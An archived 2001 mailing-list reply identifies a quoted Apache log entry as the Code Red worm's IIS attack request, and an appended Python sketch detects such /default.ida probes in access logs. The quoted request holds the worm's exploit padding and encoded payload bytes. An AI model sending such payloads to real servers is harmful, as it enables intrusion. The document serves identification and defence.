Re: [cobalt-developers] Hacking attempts???
- Subject: Re: [cobalt-developers] Hacking attempts???
- From: Derek Belrose <derekb@xxxxxxxxxxxxxxxxxx>
- Date: Fri Aug 17 09:07:06 2001
- List-id: Discussion Forum for developers on Sun Cobalt Networks products <cobalt-developers.list.cobalt.com>
What you see there is the exact string that the Code Red worm uses to
hit an IIS server. I've seen server logs full of requests like these.
> > Anyone got any idea what this is?
> >
> >
> > 207.108.246.5 - - [13/Aug/2001:00:57:29 +0100] "GET
> >
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> >
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> >
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> >
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
> bd3%
> >
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> > HTTP/1.0" 302 627 "-" "-"
> >
> > My logs show this multiple times today
> >
> > Regards
> > Jamie Rossi
> >
> >
> >
> > _______________________________________________
> > cobalt-developers mailing list
> > cobalt-developers@xxxxxxxxxxxxxxx
> > http://list.cobalt.com/mailman/listinfo/cobalt-developers
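
A detection sketch for the request pattern quoted above, as an added example that is not part of the original thread: it scans Apache-style access log lines for `/default.ida?` requests that carry a long single-character padding run followed by `%u` escapes, and tallies hits per source host. The thresholds, function names and sample log lines (documentation-range addresses, placeholder escapes) are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Apache common/combined format: host ident user [time] "request" status size ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<req>[^"]*)" (?P<status>\d{3}) ')
# /default.ida query made of one letter repeated 100+ times, then the rest of the URL
IDA_RE = re.compile(r'^GET /default\.ida\?(?P<pad>(?P<ch>[A-Za-z])(?P=ch){99,})'
                    r'(?P<tail>\S*)', re.I)
U_ESC = re.compile(r'%u[0-9a-fA-F]{4}')
MIN_ESCAPES = 3  # assumed threshold; a benign .ida query carries no %uXXXX escapes

def classify(line):
    """Return a dict describing a matching request, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    r = IDA_RE.match(m['req'])
    if not r or len(U_ESC.findall(r['tail'])) < MIN_ESCAPES:
        return None
    return {'host': m['host'], 'time': m['time'], 'status': int(m['status']),
            'pad_char': r['ch'], 'pad_len': len(r['pad']),
            'escapes': len(U_ESC.findall(r['tail']))}

def summarize(lines):
    """Return (hits, per-host counter) for an iterable of log lines."""
    hits = [h for h in map(classify, lines) if h]
    return hits, Counter(h['host'] for h in hits)

# Constructed sample lines: RFC 5737 addresses and placeholder %u values.
PROBE = '/default.ida?' + 'X' * 224 + '%u4141%u4242%u4343%u4444%u00=a'
SAMPLE = [
    f'192.0.2.10 - - [13/Aug/2001:00:57:29 +0100] "GET {PROBE} HTTP/1.0" 302 627 "-" "-"',
    f'192.0.2.10 - - [13/Aug/2001:01:02:11 +0100] "GET {PROBE} HTTP/1.0" 404 280 "-" "-"',
    '198.51.100.7 - - [13/Aug/2001:01:03:40 +0100] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
    '198.51.100.7 - - [13/Aug/2001:01:04:02 +0100] "GET /default.ida?q=report HTTP/1.0" 404 280 "-" "-"',
]

if __name__ == '__main__':
    hits, by_host = summarize(SAMPLE)
    for h in hits:
        print(h)
    for host, count in by_host.most_common():
        print(f'{host}: {count} matching request(s)')
```

The recorded status code shows how the local server answered each probe, which helps separate noise on a non-IIS host from a request that was actually served.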